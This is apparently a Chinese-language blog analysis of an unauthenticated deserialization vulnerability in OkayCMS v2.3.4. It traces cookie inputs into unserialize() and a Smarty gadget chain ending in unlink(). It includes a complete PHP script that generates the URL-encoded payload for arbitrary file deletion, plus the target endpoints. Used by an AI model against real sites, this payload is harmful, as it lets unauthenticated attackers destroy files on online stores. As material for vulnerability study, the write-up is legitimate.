【反序列化利用链通用思路】OkayCMS&Smarty反序列化利用链详细分析

简介: OkayCMS 是一个来自俄罗斯现成的在线商店平台,提供了在真正的演示在线商店中工作的机会,可以在其中执行任何操作。在管理面板中无限制地添加和删除产品、导入、更改语言和货币。

01 漏洞简介

OkayCMS 是一个来自俄罗斯现成的在线商店平台,提供了在真正的演示在线商店中工作的机会,可以在其中执行任何操作。在管理面板中无限制地添加和删除产品、导入、更改语言和货币。


OKAYCMS v2.3.4中存在一处反序列化漏洞,存在于view/ProductsView.phpapi/Comparison.php中未经身份验证的攻击者可以通过此处反序列化漏洞构造任意文件删除的利用链





02 漏洞分析

安装过程省略(使用composer、并且更改config目录中的配置文件、导入一下数据库即可)




①view/ProductsView.php fetch()方法:

在516行左右,这里将通过$_COOKIE传入的price_filter参数未进行过滤,直接传入unserialize()进行反序列化,所以满足反序列化内容可控条件



访问到此方法:


http://xxx.com/en/catalog/myagkie-igrushki/sort-price




②api/Comparison.php

文件中有三处地方进行了反序列化:

get_comparison()



add_item()



delete_item()


接收传参的方式和前面一样,也是通过COOKIE接收comparison的值,未进行过滤直接进行反序列化




接着我们看程序中哪里调用了上面的api接口,ajax/comparison.php文件中

这里通过get方式传入了action参数,判断它的值分别调用不同的方法



例如访问add_item


http://xxx/com/ajax/comparison.php?action=add


至此针对反序列化的可控利用点已经分析完了,那么接下来就得找到并构造利用链进行深入利用了




根据OkayCMS的目录结构可以得知,程序使用了Smarty模板进行开发,所以我们可以直接使用Smarty中的反序列化利用链进行利用,与使用thinkphp二开的cms类似,只要找到可控的反序列化利用点则可以直接使用利用链进行利用




Smarty模板中的任意文件删除利用链:

/vendor/smarty/smarty/libs/sysplugins/smarty_internal_cacheresource_file.php文件中的类Smarty_Internal_CacheResource_File中的releaseLock()方法,275行左右调用了unlink()函数进行文件删除操作,所以我们只需要将$cached->lock_id设置为要删除的文件路径即可



可以看到releaseLock()方法接收的参数前有类名,这种方式称为类型约束,简单来说就是传入的参数必须为指定类的一个实例对象,分别为Smarty类和Smarty_Template_Cached类,$cached就是Smarty_Template_Cached类的实例



那么我们继续寻找有没有类中的魔术方法调用了上面的releaseLock()方法,全局搜索,熟悉的__destruct()析构方法



跟进smarty_internal_template.php中的Smarty_Internal_Template类的__destruct()析构方法:

这里只要满足了if判断的条件,就会执行releaseLock()方法,首先看第一个条件$this->smarty->cache_locking,我们将$this->smarty设置为Smarty所以是设置其cache_locking属性值为true即可,然后$this->cached需要有值,会将其设置为Smarty_Template_Cached类所以也是有值的,最后看$this->cached->is_locked,也就是Smarty_Template_Cached类中的属性is_locked需要为true,满足以上所有条件就可以执行分支内代码



使用$this->cached->handler->releaseLock()的方式执行,而$this->cached等于Smarty_Template_Cached类,即设置其handler属性为Smarty_Internal_CacheResource_File类(最开始定义releaseLock()方法的类),最终成功执行releaseLock()方法




大致的利用思路已经讲完了,那么接下来构造EXP:


<?php
class Smarty{
    public $cache_locking = true;
}
class Smarty_Internal_CacheResource_File{
}
class Smarty_Template_Cached
{
    public $handler = null;
    public $is_locked;
    public $lock_id;
    public function __construct()
{
        $this->handler = new Smarty_Internal_CacheResource_File;
        $this->is_locked = true;
        $this->lock_id = dirname(__FILE__)."/test.txt";    // 文件删除的路径
    }
}
class Smarty_Internal_Template{
    public $smarty = null;
    public $cached = null;
    public function __construct()
{
        $this->smarty = new Smarty;
        $this->cached = new Smarty_Template_Cached;
    }
}
$a = new Smarty_Internal_Template();
$b = serialize($a);
echo urlencode($b);    // 因为通过COOKIE传参,payload中有分号就会截断




然后通过COOKIE传payload即可:


执行后会删除index.php同目录下的test.txt文件


目录
相关文章
|
1月前
|
JSON 数据格式 索引
Python中序列化/反序列化JSON格式的数据
【11月更文挑战第4天】本文介绍了 Python 中使用 `json` 模块进行序列化和反序列化的操作。序列化是指将 Python 对象(如字典、列表)转换为 JSON 字符串,主要使用 `json.dumps` 方法。示例包括基本的字典和列表序列化,以及自定义类的序列化。反序列化则是将 JSON 字符串转换回 Python 对象,使用 `json.loads` 方法。文中还提供了具体的代码示例,展示了如何处理不同类型的 Python 对象。
|
1月前
|
存储 安全 Java
Java编程中的对象序列化与反序列化
【10月更文挑战第22天】在Java的世界里,对象序列化和反序列化是数据持久化和网络传输的关键技术。本文将带你了解如何在Java中实现对象的序列化与反序列化,并探讨其背后的原理。通过实际代码示例,我们将一步步展示如何将复杂数据结构转换为字节流,以及如何将这些字节流还原为Java对象。文章还将讨论在使用序列化时应注意的安全性问题,以确保你的应用程序既高效又安全。
|
2月前
|
存储 Java
Java编程中的对象序列化与反序列化
【10月更文挑战第9天】在Java的世界里,对象序列化是连接数据持久化与网络通信的桥梁。本文将深入探讨Java对象序列化的机制、实践方法及反序列化过程,通过代码示例揭示其背后的原理。从基础概念到高级应用,我们将一步步揭开序列化技术的神秘面纱,让读者能够掌握这一强大工具,以应对数据存储和传输的挑战。
|
2月前
|
存储 安全 Java
Java编程中的对象序列化与反序列化
【10月更文挑战第3天】在Java编程的世界里,对象序列化与反序列化是实现数据持久化和网络传输的关键技术。本文将深入探讨Java序列化的原理、应用场景以及如何通过代码示例实现对象的序列化与反序列化过程。从基础概念到实践操作,我们将一步步揭示这一技术的魅力所在。
|
1月前
|
存储 缓存 NoSQL
一篇搞懂!Java对象序列化与反序列化的底层逻辑
本文介绍了Java中的序列化与反序列化,包括基本概念、应用场景、实现方式及注意事项。序列化是将对象转换为字节流,便于存储和传输;反序列化则是将字节流还原为对象。文中详细讲解了实现序列化的步骤,以及常见的反序列化失败原因和最佳实践。通过实例和代码示例,帮助读者更好地理解和应用这一重要技术。
44 0
|
3月前
|
JSON 安全 编译器
扩展类实例的序列化和反序列化
扩展类实例的序列化和反序列化
42 1
|
3月前
|
存储 XML JSON
用示例说明序列化和反序列化
用示例说明序列化和反序列化
24 1
|
4月前
|
存储 Java
【IO面试题 四】、介绍一下Java的序列化与反序列化
Java的序列化与反序列化允许对象通过实现Serializable接口转换成字节序列并存储或传输,之后可以通过ObjectInputStream和ObjectOutputStream的方法将这些字节序列恢复成对象。
|
4月前
|
存储 开发框架 .NET
解锁SqlSugar新境界:利用Serialize.Linq实现Lambda表达式灵活序列化与反序列化,赋能动态数据查询新高度!
【8月更文挑战第3天】随着软件开发复杂度提升,数据查询的灵活性变得至关重要。SqlSugar作为一款轻量级、高性能的.NET ORM框架,简化了数据库操作。但在需要跨服务共享查询逻辑时,直接传递Lambda表达式不可行。这时,Serialize.Linq库大显身手,能将Linq表达式序列化为字符串,实现在不同服务间传输查询逻辑。结合使用SqlSugar和Serialize.Linq,不仅能够保持代码清晰,还能实现复杂的动态查询逻辑,极大地增强了应用程序的灵活性和可扩展性。
157 2
|
3月前
|
JSON fastjson Java
niubility!即使JavaBean没有默认无参构造器,fastjson也可以反序列化。- - - - 阿里Fastjson反序列化源码分析
本文详细分析了 Fastjson 反序列化对象的源码(版本 fastjson-1.2.60),揭示了即使 JavaBean 沲有默认无参构造器,Fastjson 仍能正常反序列化的技术内幕。文章通过案例展示了 Fastjson 在不同构造器情况下的行为,并深入探讨了 `ParserConfig#getDeserializer` 方法的核心逻辑。此外,还介绍了 ASM 字节码技术的应用及其在反序列化过程中的角色。
95 10
下一篇
DataWorks